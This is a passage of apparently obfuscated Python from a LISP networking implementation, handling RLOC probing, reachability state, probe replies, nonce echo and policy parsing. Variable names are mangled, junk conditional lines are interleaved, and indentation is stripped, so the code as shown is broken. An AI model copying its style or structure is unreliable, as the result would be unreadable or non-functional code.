if ( Oo0o0O0ooO0o . translated_port == iiI1I1Ii . translated_port and Oo0o0O0ooO0o . rloc_name == iiI1I1Ii . rloc_name ) :
if 37 - 37: iII111i - Ii1I . oO0o
oOo = green ( lisp_print_eid_tuple ( ooOOoo0 , IIi1iiIII11 ) , False )
lprint ( "Suppress probe to duplicate RLOC {} for {}" . format ( red ( oo0o00OO , False ) , oOo ) )
if 47 - 47: IiII / I1ii11iIi11i . o0oOOo0O0Ooo . ooOoO0o + OOooOOo . OOooOOo
if 25 - 25: oO0o
if 43 - 43: Ii1I - o0oOOo0O0Ooo % oO0o - O0
if 20 - 20: OoO0O00 . ooOoO0o / OoOoOO00 - OoOoOO00 . iII111i / OOooOOo
if 39 - 39: iIii1I11I1II1 % ooOoO0o
if 75 - 75: i1IIi * II111iiii * O0 * i11iIiiIii % iII111i / iII111i
iiI1I1Ii . last_rloc_probe = Oo0o0O0ooO0o . last_rloc_probe
continue
if 36 - 36: IiII / I1IiiI % iII111i / iII111i
if 38 - 38: OOooOOo * I1ii11iIi11i * I1Ii111 + I11i
if 65 - 65: O0 + O0 * I1Ii111
II11111Iii1I = None
I1IIiIIIii = None
while ( True ) :
I1IIiIIIii = iiI1I1Ii if I1IIiIIIii == None else I1IIiIIIii . next_rloc
if ( I1IIiIIIii == None ) : break
if 66 - 66: OOooOOo / O0 + i1IIi . O0 % I1ii11iIi11i - OoooooooOO
if 16 - 16: I11i % iII111i
if 29 - 29: I1IiiI - ooOoO0o * OoO0O00 . i11iIiiIii % OoOoOO00 * o0oOOo0O0Ooo
if 43 - 43: OoO0O00 * OOooOOo / I1Ii111 % OoOoOO00 . oO0o / OOooOOo
if 62 - 62: O0 * I1ii11iIi11i - O0 / I11i % ooOoO0o
if ( I1IIiIIIii . rloc_next_hop != None ) :
if ( I1IIiIIIii . rloc_next_hop not in oooO00OoO0O ) :
if ( I1IIiIIIii . up_state ( ) ) :
OooOOOoOoo0O0 , o00O00oo0 = I1IIiIIIii . rloc_next_hop
I1IIiIIIii . state = LISP_RLOC_UNREACH_STATE
I1IIiIIIii . last_state_change = lisp_get_timestamp ( )
lisp_update_rtr_updown ( I1IIiIIIii . rloc , False )
if 1 - 1: O0 / iIii1I11I1II1
o00 = bold ( "unreachable" , False )
lprint ( "Next-hop {}({}) for RLOC {} is {}" . format ( o00O00oo0 , OooOOOoOoo0O0 ,
red ( oo0o00OO , False ) , o00 ) )
continue
if 17 - 17: OoOoOO00 + ooOoO0o * II111iiii * OoOoOO00 + I1IiiI + i11iIiiIii
if 46 - 46: i1IIi - II111iiii . I1IiiI . i11iIiiIii
if 54 - 54: O0 * I1ii11iIi11i / OOooOOo / IiII * IiII
if 69 - 69: Oo0Ooo * OoooooooOO / I1IiiI
if 16 - 16: o0oOOo0O0Ooo
if 3 - 3: i11iIiiIii . I1ii11iIi11i
iiI = I1IIiIIIii . last_rloc_probe
OoO0OO0OO000o = 0 if iiI == None else time . time ( ) - iiI
if ( I1IIiIIIii . unreach_state ( ) and OoO0OO0OO000o < LISP_RLOC_PROBE_INTERVAL ) :
lprint ( "Waiting for probe-reply from RLOC {}" . format ( red ( oo0o00OO , False ) ) )
if 10 - 10: IiII + OOooOOo . iII111i - ooOoO0o
continue
if 100 - 100: o0oOOo0O0Ooo
if 95 - 95: iII111i * oO0o * i1IIi
if 100 - 100: iII111i . o0oOOo0O0Ooo - I1Ii111 % oO0o
if 11 - 11: o0oOOo0O0Ooo . OoooooooOO - i1IIi
if 71 - 71: I1IiiI . OOooOOo . I1ii11iIi11i
if 90 - 90: i11iIiiIii + I1Ii111 % II111iiii
ii1 = lisp_get_echo_nonce ( None , oo0o00OO )
if ( ii1 and ii1 . request_nonce_timeout ( ) ) :
I1IIiIIIii . state = LISP_RLOC_NO_ECHOED_NONCE_STATE
I1IIiIIIii . last_state_change = lisp_get_timestamp ( )
o00 = bold ( "unreachable" , False )
lprint ( "RLOC {} went {}, nonce-echo failed" . format ( red ( oo0o00OO , False ) , o00 ) )
if 67 - 67: OoOoOO00 / iII111i * OoO0O00 % i11iIiiIii
lisp_update_rtr_updown ( I1IIiIIIii . rloc , False )
continue
if 76 - 76: OoO0O00
if 92 - 92: iIii1I11I1II1 * O0 % I11i
if 92 - 92: OoOoOO00 + oO0o
if 89 - 89: IiII % iII111i / iIii1I11I1II1 . Ii1I . Oo0Ooo + ooOoO0o
if 28 - 28: I1IiiI . iIii1I11I1II1
if 12 - 12: I1Ii111 * OOooOOo
if ( ii1 and ii1 . recently_echoed ( ) ) :
lprint ( ( "Suppress RLOC-probe to {}, nonce-echo " + "received" ) . format ( red ( oo0o00OO , False ) ) )
if 11 - 11: II111iiii % O0 % O0 % o0oOOo0O0Ooo
continue
if 45 - 45: OoooooooOO * oO0o
if 74 - 74: ooOoO0o * I11i / oO0o - IiII + OoOoOO00
if 16 - 16: Oo0Ooo
if 29 - 29: Oo0Ooo . I1ii11iIi11i / II111iiii / oO0o / o0oOOo0O0Ooo + I11i
if 4 - 4: OoooooooOO % I1ii11iIi11i . OoO0O00 * o0oOOo0O0Ooo + I1ii11iIi11i * IiII
if 67 - 67: I1IiiI
if ( I1IIiIIIii . last_rloc_probe != None ) :
iiI = I1IIiIIIii . last_rloc_probe_reply
if ( iiI == None ) : iiI = 0
OoO0OO0OO000o = time . time ( ) - iiI
if ( I1IIiIIIii . up_state ( ) and OoO0OO0OO000o >= LISP_RLOC_PROBE_REPLY_WAIT ) :
if 93 - 93: ooOoO0o . Ii1I + IiII / Oo0Ooo % I11i
I1IIiIIIii . state = LISP_RLOC_UNREACH_STATE
I1IIiIIIii . last_state_change = lisp_get_timestamp ( )
lisp_update_rtr_updown ( I1IIiIIIii . rloc , False )
o00 = bold ( "unreachable" , False )
lprint ( "RLOC {} went {}, probe it" . format ( red ( oo0o00OO , False ) , o00 ) )
if 40 - 40: Oo0Ooo % OoOoOO00 . IiII / I1IiiI % OoooooooOO
if 33 - 33: OOooOOo - OoooooooOO . iII111i
lisp_mark_rlocs_for_other_eids ( O0ooooooOo0 )
if 2 - 2: I11i + i1IIi
if 52 - 52: I11i - OoO0O00 % I1Ii111 . OOooOOo
if 90 - 90: O0 - Oo0Ooo / i1IIi * iIii1I11I1II1 % o0oOOo0O0Ooo / oO0o
I1IIiIIIii . last_rloc_probe = lisp_get_timestamp ( )
if 73 - 73: iII111i % iIii1I11I1II1 + o0oOOo0O0Ooo % Ii1I . II111iiii + IiII
OOooO0o0oo00o = "" if I1IIiIIIii . unreach_state ( ) == False else " unreachable"
if 59 - 59: Oo0Ooo
if 40 - 40: o0oOOo0O0Ooo
if 50 - 50: i11iIiiIii . I1ii11iIi11i * I1Ii111
if 22 - 22: I1ii11iIi11i . i1IIi + I1ii11iIi11i / OoooooooOO - i11iIiiIii / iIii1I11I1II1
if 96 - 96: o0oOOo0O0Ooo . I1Ii111 + Oo0Ooo . I11i + ooOoO0o
if 33 - 33: OoO0O00 / OOooOOo % Oo0Ooo . o0oOOo0O0Ooo % II111iiii
if 62 - 62: iII111i . OoooooooOO - i1IIi
OO0oooO = ""
o00O00oo0 = None
if ( I1IIiIIIii . rloc_next_hop != None ) :
OooOOOoOoo0O0 , o00O00oo0 = I1IIiIIIii . rloc_next_hop
lisp_install_host_route ( oo0o00OO , o00O00oo0 , True )
OO0oooO = ", send on nh {}({})" . format ( o00O00oo0 , OooOOOoOoo0O0 )
if 38 - 38: I1ii11iIi11i / o0oOOo0O0Ooo
if 95 - 95: iIii1I11I1II1 / OoOoOO00 % I1Ii111
if 54 - 54: OoooooooOO % Ii1I
if 100 - 100: OOooOOo - I11i . O0 * i1IIi % OoooooooOO - ooOoO0o
if 54 - 54: O0 + I11i
oo0000OoO = I1IIiIIIii . print_rloc_probe_rtt ( )
ooooooO = oo0o00OO
if ( I1IIiIIIii . translated_port != 0 ) :
ooooooO += ":{}" . format ( I1IIiIIIii . translated_port )
if 13 - 13: iIii1I11I1II1 - OoooooooOO . OoooooooOO + iII111i - OoOoOO00 % oO0o
ooooooO = red ( ooooooO , False )
if ( I1IIiIIIii . rloc_name != None ) :
ooooooO += " (" + blue ( I1IIiIIIii . rloc_name , False ) + ")"
if 11 - 11: ooOoO0o * iIii1I11I1II1 + OoooooooOO + OoO0O00
lprint ( "Send {}{} {}, last rtt: {}{}" . format ( oO0oo000O , OOooO0o0oo00o ,
ooooooO , oo0000OoO , OO0oooO ) )
if 24 - 24: iII111i . OoO0O00 * Ii1I - OOooOOo . I11i
if 90 - 90: I1ii11iIi11i % Oo0Ooo + I1ii11iIi11i - i1IIi
if 94 - 94: OoooooooOO
if 80 - 80: O0 * OOooOOo + i1IIi + i11iIiiIii * o0oOOo0O0Ooo
if 14 - 14: II111iiii * OOooOOo - O0 / I1ii11iIi11i . OoO0O00 . ooOoO0o
if 98 - 98: o0oOOo0O0Ooo . i1IIi
if 83 - 83: i11iIiiIii + OOooOOo % iII111i
if 59 - 59: I11i
if ( I1IIiIIIii . rloc_next_hop != None ) :
II11111Iii1I = lisp_get_host_route_next_hop ( oo0o00OO )
if ( II11111Iii1I ) : lisp_install_host_route ( oo0o00OO , II11111Iii1I , False )
if 23 - 23: OoOoOO00 * I1Ii111
if 18 - 18: o0oOOo0O0Ooo % i11iIiiIii . Ii1I . O0
if 85 - 85: I1ii11iIi11i * iIii1I11I1II1 + o0oOOo0O0Ooo * OoO0O00
if 25 - 25: o0oOOo0O0Ooo / Ii1I / Oo0Ooo . ooOoO0o - ooOoO0o * O0
if 14 - 14: O0 - Ii1I + iIii1I11I1II1 + II111iiii . ooOoO0o + Ii1I
if 25 - 25: OoO0O00 * oO0o
if ( I1IIiIIIii . rloc . is_null ( ) ) :
I1IIiIIIii . rloc . copy_address ( iiI1I1Ii . rloc )
if 29 - 29: OOooOOo - I1Ii111 - i11iIiiIii % i1IIi
if 2 - 2: i11iIiiIii % iIii1I11I1II1 * OOooOOo
if 45 - 45: oO0o + i1IIi + iII111i + o0oOOo0O0Ooo * OOooOOo + ooOoO0o
if 83 - 83: OoO0O00 - ooOoO0o / OoooooooOO % iIii1I11I1II1 - II111iiii
if 73 - 73: Oo0Ooo + II111iiii - IiII
i1I1I = None if ( IIi1iiIII11 . is_null ( ) ) else ooOOoo0
Ooii1 = ooOOoo0 if ( IIi1iiIII11 . is_null ( ) ) else IIi1iiIII11
lisp_send_map_request ( lisp_sockets , 0 , i1I1I , Ooii1 , I1IIiIIIii )
Oo0o0O0ooO0o = iiI1I1Ii
if 72 - 72: ooOoO0o + oO0o + IiII * I1Ii111 % oO0o
if 55 - 55: IiII . ooOoO0o - II111iiii * I1IiiI . I1Ii111
if 39 - 39: iIii1I11I1II1 . II111iiii + oO0o . iII111i + Ii1I
if 91 - 91: Ii1I + I1Ii111
if ( o00O00oo0 ) : lisp_install_host_route ( oo0o00OO , o00O00oo0 , False )
if 7 - 7: ooOoO0o + I1ii11iIi11i % OoO0O00
if 45 - 45: i1IIi / o0oOOo0O0Ooo / iII111i * OoOoOO00 . IiII
if 60 - 60: o0oOOo0O0Ooo
if 63 - 63: i11iIiiIii * Oo0Ooo * I1Ii111
if 56 - 56: I1Ii111 . i11iIiiIii
if ( II11111Iii1I ) : lisp_install_host_route ( oo0o00OO , II11111Iii1I , True )
if 76 - 76: II111iiii / ooOoO0o * i11iIiiIii . O0 / O0 - i11iIiiIii
if 89 - 89: o0oOOo0O0Ooo . I1Ii111 * I11i + oO0o - OoooooooOO + OoO0O00
if 25 - 25: i1IIi * I1Ii111 * iII111i . OoooooooOO
if 70 - 70: iIii1I11I1II1
I1I1 += 1
if ( ( I1I1 % 10 ) == 0 ) : time . sleep ( 0.020 )
if 1 - 1: II111iiii . I1IiiI + o0oOOo0O0Ooo
if 5 - 5: I1ii11iIi11i % I11i - II111iiii
if 70 - 70: ooOoO0o - IiII - OoO0O00 / I11i
lprint ( "---------- End RLOC Probing ----------" )
return
if 59 - 59: IiII % ooOoO0o . iII111i / Ii1I * Ii1I
if 73 - 73: I1ii11iIi11i . oO0o % I11i . I1ii11iIi11i / I1Ii111 / II111iiii
if 23 - 23: OoooooooOO . o0oOOo0O0Ooo
if 76 - 76: I1Ii111
if 91 - 91: iIii1I11I1II1 / Ii1I . I1IiiI
if 63 - 63: ooOoO0o . Ii1I - I1Ii111 - oO0o * I1Ii111 + ooOoO0o
if 85 - 85: II111iiii + I1ii11iIi11i
if 33 - 33: iII111i
def lisp_update_rtr_updown ( rtr , updown ) :
global lisp_ipc_socket
if 14 - 14: O0 * Oo0Ooo / i1IIi
if 95 - 95: O0 % i1IIi % ooOoO0o % oO0o - I1IiiI
if 78 - 78: II111iiii % OOooOOo
if 6 - 6: OOooOOo
if ( lisp_i_am_itr == False ) : return
if 21 - 21: I1Ii111 - Ii1I - i1IIi % oO0o
if 55 - 55: OOooOOo + oO0o - II111iiii
if 5 - 5: iII111i * OoooooooOO . OoO0O00 % ooOoO0o + Ii1I
if 59 - 59: OoOoOO00
if 96 - 96: I1IiiI
if ( lisp_register_all_rtrs ) : return
if 3 - 3: OoooooooOO
I11ii1iIi111i = rtr . print_address_no_iid ( )
if 96 - 96: IiII
if 55 - 55: iIii1I11I1II1 + II111iiii . I1ii11iIi11i + Oo0Ooo . Ii1I * IiII
if 91 - 91: iIii1I11I1II1 / Oo0Ooo
if 68 - 68: o0oOOo0O0Ooo * OoOoOO00 . I1ii11iIi11i
if 32 - 32: OoooooooOO * I11i
if ( lisp_rtr_list . has_key ( I11ii1iIi111i ) == False ) : return
if 86 - 86: I1Ii111 - i1IIi % O0
updown = "up" if updown else "down"
lprint ( "Send ETR IPC message, RTR {} has done {}" . format (
red ( I11ii1iIi111i , False ) , bold ( updown , False ) ) )
if 38 - 38: I1IiiI + OoO0O00 % iII111i / ooOoO0o
if 93 - 93: OoOoOO00 . o0oOOo0O0Ooo - OoooooooOO
if 90 - 90: iIii1I11I1II1 . Ii1I / i11iIiiIii . oO0o . I11i - I11i
if 46 - 46: I11i
iiiii1i1 = "rtr%{}%{}" . format ( I11ii1iIi111i , updown )
iiiii1i1 = lisp_command_ipc ( iiiii1i1 , "lisp-itr" )
lisp_ipc ( iiiii1i1 , lisp_ipc_socket , "lisp-etr" )
return
if 2 - 2: I1Ii111 * oO0o
if 93 - 93: I11i
if 2 - 2: i1IIi / I1IiiI
if 29 - 29: Ii1I * iIii1I11I1II1 * i1IIi
if 83 - 83: oO0o % O0 . I11i / I11i / I1IiiI - OoOoOO00
if 91 - 91: iIii1I11I1II1 - IiII + iIii1I11I1II1 % Oo0Ooo % I1IiiI
if 84 - 84: iIii1I11I1II1 . Oo0Ooo - OoooooooOO % Oo0Ooo
def lisp_process_rloc_probe_reply ( rloc_entry , source , port , map_reply , ttl ,
mrloc ) :
I1IIiIIIii = rloc_entry . rloc
Iii11I = map_reply . nonce
III1I1IIi = map_reply . hop_count
oO0oo000O = bold ( "RLOC-probe reply" , False )
i1Ii1I1iii = I1IIiIIIii . print_address_no_iid ( )
O000oO = source . print_address_no_iid ( )
I1i1IiII = lisp_rloc_probe_list
oOooo0o = rloc_entry . json . json_string if rloc_entry . json else None
i1 = lisp_get_timestamp ( )
if 51 - 51: Oo0Ooo - o0oOOo0O0Ooo * II111iiii + i1IIi
if 83 - 83: I11i * o0oOOo0O0Ooo * Ii1I + OoooooooOO
if 76 - 76: I1ii11iIi11i . OoooooooOO + ooOoO0o / I1IiiI
if 56 - 56: Ii1I % I11i / O0 % O0 % iIii1I11I1II1 + I1IiiI
if 51 - 51: O0 * Ii1I / oO0o * OoooooooOO
if 93 - 93: I1ii11iIi11i . OOooOOo + i1IIi
if ( mrloc != None ) :
iIi1I1i = mrloc . rloc . print_address_no_iid ( )
if ( mrloc . multicast_rloc_probe_list . has_key ( i1Ii1I1iii ) == False ) :
I111iII1I11II = lisp_rloc ( )
I111iII1I11II = copy . deepcopy ( mrloc )
I111iII1I11II . rloc . copy_address ( I1IIiIIIii )
I111iII1I11II . multicast_rloc_probe_list = { }
mrloc . multicast_rloc_probe_list [ i1Ii1I1iii ] = I111iII1I11II
if 55 - 55: ooOoO0o . ooOoO0o % i11iIiiIii * I1IiiI - IiII . Ii1I
I111iII1I11II = mrloc . multicast_rloc_probe_list [ i1Ii1I1iii ]
I111iII1I11II . last_rloc_probe_nonce = mrloc . last_rloc_probe_nonce
I111iII1I11II . last_rloc_probe = mrloc . last_rloc_probe
O0OOOO0o0O , ooOOoo0 , IIi1iiIII11 = lisp_rloc_probe_list [ iIi1I1i ] [ 0 ]
I111iII1I11II . process_rloc_probe_reply ( i1 , Iii11I , ooOOoo0 , IIi1iiIII11 , III1I1IIi , ttl , oOooo0o )
mrloc . process_rloc_probe_reply ( i1 , Iii11I , ooOOoo0 , IIi1iiIII11 , III1I1IIi , ttl , oOooo0o )
return
if 54 - 54: iII111i
if 2 - 2: OoOoOO00 + I1IiiI . ooOoO0o - oO0o . iIii1I11I1II1
if 76 - 76: Ii1I
if 31 - 31: ooOoO0o
if 70 - 70: O0
if 42 - 42: I1Ii111 + OoooooooOO + I11i
if 48 - 48: Oo0Ooo . IiII / ooOoO0o + I11i
IiiIIi1 = i1Ii1I1iii
if ( I1i1IiII . has_key ( IiiIIi1 ) == False ) :
IiiIIi1 += ":" + str ( port )
if ( I1i1IiII . has_key ( IiiIIi1 ) == False ) :
IiiIIi1 = O000oO
if ( I1i1IiII . has_key ( IiiIIi1 ) == False ) :
IiiIIi1 += ":" + str ( port )
lprint ( " Received unsolicited {} from {}/{}, port {}" . format ( oO0oo000O , red ( i1Ii1I1iii , False ) , red ( O000oO ,
# I1IiiI - ooOoO0o / I1ii11iIi11i
False ) , port ) )
return
if 82 - 82: II111iiii % OoOoOO00
if 32 - 32: i11iIiiIii
if 38 - 38: IiII + I1Ii111 % Ii1I / Ii1I
if 39 - 39: iII111i * i11iIiiIii
if 31 - 31: IiII - Ii1I . i1IIi
if 1 - 1: o0oOOo0O0Ooo + OOooOOo % Ii1I - O0 / I1ii11iIi11i
if 20 - 20: o0oOOo0O0Ooo + II111iiii * Ii1I . OoooooooOO
if 88 - 88: O0 + iIii1I11I1II1 . o0oOOo0O0Ooo . iIii1I11I1II1 - Ii1I
for I1IIiIIIii , ooOOoo0 , IIi1iiIII11 in lisp_rloc_probe_list [ IiiIIi1 ] :
if ( lisp_i_am_rtr ) :
if ( I1IIiIIIii . translated_port != 0 and I1IIiIIIii . translated_port != port ) :
continue
if 74 - 74: Ii1I . IiII
if 67 - 67: oO0o
I1IIiIIIii . process_rloc_probe_reply ( i1 , Iii11I , ooOOoo0 , IIi1iiIII11 , III1I1IIi , ttl , oOooo0o )
if 12 - 12: I1IiiI + OoooooooOO
return
if 25 - 25: iIii1I11I1II1 - I1IiiI . i11iIiiIii + ooOoO0o
if 19 - 19: OoooooooOO / IiII
if 40 - 40: OoOoOO00 / OoooooooOO * iIii1I11I1II1 / i1IIi . OoooooooOO
if 88 - 88: I1IiiI % I1IiiI / II111iiii - IiII
if 72 - 72: OoO0O00 - I1ii11iIi11i . Oo0Ooo / OoO0O00
if 86 - 86: i11iIiiIii - oO0o . i11iIiiIii
if 51 - 51: OoO0O00 - OoO0O00 * IiII
if 24 - 24: OoooooooOO . II111iiii
def lisp_db_list_length ( ) :
I1I1 = 0
for ooOOo0ooo in lisp_db_list :
I1I1 += len ( ooOOo0ooo . dynamic_eids ) if ooOOo0ooo . dynamic_eid_configured ( ) else 1
I1I1 += len ( ooOOo0ooo . eid . iid_list )
if 97 - 97: II111iiii . O0
return ( I1I1 )
if 18 - 18: iII111i
if 35 - 35: ooOoO0o / O0 / iIii1I11I1II1 - iIii1I11I1II1 + I11i
if 8 - 8: I1Ii111 . oO0o % Oo0Ooo * OoooooooOO
if 25 - 25: OoO0O00
if 54 - 54: O0
if 20 - 20: ooOoO0o + Oo0Ooo - Oo0Ooo
if 2 - 2: i1IIi - IiII . I1ii11iIi11i / i1IIi
if 92 - 92: ooOoO0o - iII111i
def lisp_is_myeid ( eid ) :
for ooOOo0ooo in lisp_db_list :
if ( eid . is_more_specific ( ooOOo0ooo . eid ) ) : return ( True )
if 69 - 69: iII111i
return ( False )
if 48 - 48: O0 + o0oOOo0O0Ooo . oO0o - IiII * OoooooooOO . OoO0O00
if 63 - 63: oO0o * OoO0O00 * oO0o
if 31 - 31: Oo0Ooo
if 90 - 90: I11i . IiII * iIii1I11I1II1 . I11i + i1IIi
if 67 - 67: I1Ii111 . I1ii11iIi11i
if 2 - 2: O0 + I1Ii111
if 82 - 82: Ii1I / iII111i
if 13 - 13: I11i + iII111i
if 54 - 54: I1ii11iIi11i - I1IiiI . Ii1I
def lisp_format_macs ( sa , da ) :
sa = sa [ 0 : 4 ] + "-" + sa [ 4 : 8 ] + "-" + sa [ 8 : 12 ]
da = da [ 0 : 4 ] + "-" + da [ 4 : 8 ] + "-" + da [ 8 : 12 ]
return ( "{} -> {}" . format ( sa , da ) )
if 59 - 59: Oo0Ooo + I1ii11iIi11i
if 87 - 87: ooOoO0o * OoooooooOO + OoO0O00 + oO0o - I1Ii111
if 70 - 70: i1IIi . Ii1I / Ii1I
if 9 - 9: iII111i + I1Ii111 + iII111i % ooOoO0o + i11iIiiIii + i11iIiiIii
if 45 - 45: i1IIi + I1ii11iIi11i
if 49 - 49: i11iIiiIii . I1ii11iIi11i
if 91 - 91: ooOoO0o - OOooOOo - OOooOOo * o0oOOo0O0Ooo
def lisp_get_echo_nonce ( rloc , rloc_str ) :
if ( lisp_nonce_echoing == False ) : return ( None )
if 33 - 33: II111iiii
if ( rloc ) : rloc_str = rloc . print_address_no_iid ( )
ii1 = None
if ( lisp_nonce_echo_list . has_key ( rloc_str ) ) :
ii1 = lisp_nonce_echo_list [ rloc_str ]
if 39 - 39: ooOoO0o + I11i
return ( ii1 )
if 24 - 24: o0oOOo0O0Ooo
if 5 - 5: i11iIiiIii - oO0o + o0oOOo0O0Ooo % ooOoO0o
if 63 - 63: oO0o
if 7 - 7: IiII / i11iIiiIii - OOooOOo
if 9 - 9: II111iiii + i11iIiiIii % I1Ii111 - Oo0Ooo * OOooOOo
if 55 - 55: I1Ii111 + ooOoO0o
if 58 - 58: iII111i . I1ii11iIi11i - Oo0Ooo % o0oOOo0O0Ooo + I1Ii111
if 58 - 58: oO0o . ooOoO0o . I1IiiI . Oo0Ooo * iIii1I11I1II1 - iII111i
def lisp_decode_dist_name ( packet ) :
I1I1 = 0
o0oOoOOooOo = ""
if 67 - 67: oO0o % i11iIiiIii - I1IiiI % iIii1I11I1II1 . iIii1I11I1II1
while ( packet [ 0 : 1 ] != "\0" ) :
if ( I1I1 == 255 ) : return ( [ None , None ] )
o0oOoOOooOo += packet [ 0 : 1 ]
packet = packet [ 1 : : ]
I1I1 += 1
if 73 - 73: OOooOOo % OoO0O00 + IiII . Ii1I * I1Ii111
if 26 - 26: iII111i - I11i
packet = packet [ 1 : : ]
return ( packet , o0oOoOOooOo )
if 5 - 5: OoO0O00 % iII111i + i1IIi - OoooooooOO
if 16 - 16: i1IIi
if 86 - 86: OoOoOO00 - iII111i - Oo0Ooo
if 33 - 33: Ii1I - OoO0O00
if 15 - 15: O0 . iIii1I11I1II1 - I1Ii111 + O0 + ooOoO0o / I1IiiI
if 8 - 8: iII111i % O0 - OoOoOO00
if 49 - 49: oO0o - OOooOOo / Ii1I / I1Ii111 . o0oOOo0O0Ooo . iII111i
if 58 - 58: IiII + Ii1I
def lisp_write_flow_log ( flow_log ) :
OOO000 = open ( "./logs/lisp-flow.log" , "a" )
if 89 - 89: Ii1I / Oo0Ooo * o0oOOo0O0Ooo / OoO0O00 + I11i
I1I1 = 0
for III11i in flow_log :
IiiiIi1iiii11 = III11i [ 3 ]
iI11IiI1II = IiiiIi1iiii11 . print_flow ( III11i [ 0 ] , III11i [ 1 ] , III11i [ 2 ] )
OOO000 . write ( iI11IiI1II )
I1I1 += 1
if 28 - 28: I1ii11iIi11i . OoOoOO00 % OoOoOO00
OOO000 . close ( )
del ( flow_log )
if 61 - 61: Ii1I % I1ii11iIi11i . I1ii11iIi11i / Oo0Ooo - I1Ii111 * OoOoOO00
I1I1 = bold ( str ( I1I1 ) , False )
lprint ( "Wrote {} flow entries to ./logs/lisp-flow.log" . format ( I1I1 ) )
return
if 47 - 47: IiII
if 76 - 76: iII111i / II111iiii / I11i
if 62 - 62: I1ii11iIi11i
if 100 - 100: iII111i / ooOoO0o / IiII % II111iiii
if 6 - 6: OoooooooOO - I1IiiI + OoooooooOO
if 89 - 89: oO0o % Oo0Ooo . O0 . ooOoO0o
if 46 - 46: IiII * I11i - OoO0O00 - Ii1I
def lisp_policy_command ( kv_pair ) :
oo00ooOOOo0O = lisp_policy ( "" )
OoOOO00o000OOO = None
if 86 - 86: oO0o - o0oOOo0O0Ooo
IiO0ooo00ooO00 = [ ]
for IiIIi1IiiIiI in range ( len ( kv_pair [ "datetime-range" ] ) ) :
IiO0ooo00ooO00 . append ( lisp_policy_match ( ) )
if 18 - 18: OOooOOo - i11iIiiIii % II111iiii + oO0o
if 82 - 82: Ii1I
for I111II in kv_pair . keys ( ) :
i11II = kv_pair [ I111II ]
if 88 - 88: iIii1I11I1II1 - o0oOOo0O0Ooo . OoOoOO00 / I1ii11iIi11i / i11iIiiIii / Ii1I
if 10 - 10: I1Ii111 / Ii1I * I1Ii111 / OoO0O00 - I1ii11iIi11i
if 7 - 7: I1IiiI . OoO0O00 . OoOoOO00 . I1ii11iIi11i * OoO0O00 - IiII
if 6 - 6: OoO0O00 + II111iiii - oO0o
if ( I111II == "instance-id" ) :
for IiIIi1IiiIiI in range ( len ( IiO0ooo00ooO00 ) ) :
OOOOOOOo00 = i11II [ IiIIi1IiiIiI ]
if ( OOOOOOOo00 == "" ) : continue
O0oOOO00 = IiO0ooo00ooO00 [ IiIIi1IiiIiI ]
if ( O0oOOO00 . source_eid == None ) :
O0oOOO00 . source_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
if 5 - 5: ooOoO0o . OoO0O00
if ( O0oOOO00 . dest_eid == None ) :
O0oOOO00 . dest_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
if 40 - 40: iII111i
O0oOOO00 . source_eid . instance_id = int ( OOOOOOOo00 )
O0oOOO00 . dest_eid . instance_id = int ( OOOOOOOo00 )
if 87 - 87: IiII / II111iiii
if 44 - 44: OoO0O00 . I1Ii111 - OoooooooOO * OoOoOO00 . OoO0O00
if ( I111II == "source-eid" ) :
for IiIIi1IiiIiI in range ( len ( IiO0ooo00ooO00 ) ) :
OOOOOOOo00 = i11II [ IiIIi1IiiIiI ]
if ( OOOOOOOo00 == "" ) : continue
O0oOOO00 = IiO0ooo00ooO00 [ IiIIi1IiiIiI ]
if ( O0oOOO00 . source_eid == None ) :
O0oOOO00 . source_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
if 84 - 84: OOooOOo . OOooOOo . oO0o % iII111i * Oo0Ooo - iIii1I11I1II1
o0OoO0000o = O0oOOO00 . source_eid . instance_id
O0oOOO00 . source_eid . store_prefix ( OOOOOOOo00 )
O0oOOO00 . source_eid . instance_id = o0OoO0000o
if 4 - 4: iII111i
if 23 - 23: i1IIi . iIii1I11I1II1 / I1IiiI . OoOoOO00 . iII111i / IiII
if ( I111II == "destination-eid" ) :
for IiIIi1IiiIiI in range ( len ( IiO0ooo00ooO00 ) ) :
OOOOOOOo00 = i11II [ IiIIi1IiiIiI ]
if ( OOOOOOOo00 == "" ) : continue
O0oOOO00 = IiO0ooo00ooO00 [ IiIIi1IiiIiI ]
if ( O0oOOO00 . dest_eid == None ) :
O0oOOO00 . dest_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
if 65 - 65: Ii1I + IiII + I11i / I1Ii111 % iIii1I11I1II1
o0OoO0000o = O0oOOO00 . dest_eid . instance_id
O0oOOO00 . dest_eid . store_prefix ( OOOOOOOo00 )
O0oOOO00 . dest_eid . instance_id = o0OoO0000o
if 17 - 17: I1ii11iIi11i * OOooOOo % II111iiii
if 30 - 30: I1Ii111 . Ii1I . Oo0Ooo / OOooOOo * OoooooooOO / I1ii11iIi11i
if ( I111II == "source-rloc" ) :
for IiIIi1IiiIiI in range ( len ( IiO0ooo00ooO00 ) ) :
OOOOOOOo00 = i11II [ IiIIi1IiiIiI ]
if ( OOOOOOOo00 == "" ) : continue
O0oOOO00 = IiO0ooo00ooO00 [ IiIIi1IiiIiI ]
O0oOOO00 . source_rloc = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
O0oOOO00 . source_rloc . store_prefix ( OOOOOOOo00 )
if 41 - 41: i1IIi
if 75 - 75: o0oOOo0O0Ooo . I1Ii111 - I1Ii111 % Ii1I * OoooooooOO
if ( I111II == "destination-rloc" ) :
for IiIIi1IiiIiI in range ( len ( IiO0ooo00ooO00 ) ) :
OOOOOOOo00 = i11II [ IiIIi1IiiIiI ]
if ( OOOOOOOo00 == "" ) : continue
O0oOOO00 = IiO0ooo00ooO00 [ IiIIi1IiiIiI ]
O0oOOO00 . dest_rloc = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
O0oOOO00 . dest_rloc . store_prefix ( OOOOOOOo00 )
if 99 - 99: OOooOOo + o0oOOo0O0Ooo - OOooOOo . i1IIi
if 86 - 86: Ii1I % oO0o - i11iIiiIii - O0 + IiII + iII111i
if ( I111II == "rloc-record-name" ) :
for IiIIi1IiiIiI in range ( len ( IiO0ooo00ooO00 ) ) :
OOOOOOOo00 = i11II [ IiIIi1IiiIiI ]
if ( OOOOOOOo00 == "" ) : continue
O0oOOO00 = IiO0ooo00ooO00 [ IiIIi1IiiIiI ]
O0oOOO00 . rloc_record_name = OOOOOOOo00
if 100 - 100: OoO0O00 . Oo0Ooo
if 29 - 29: OoO0O00
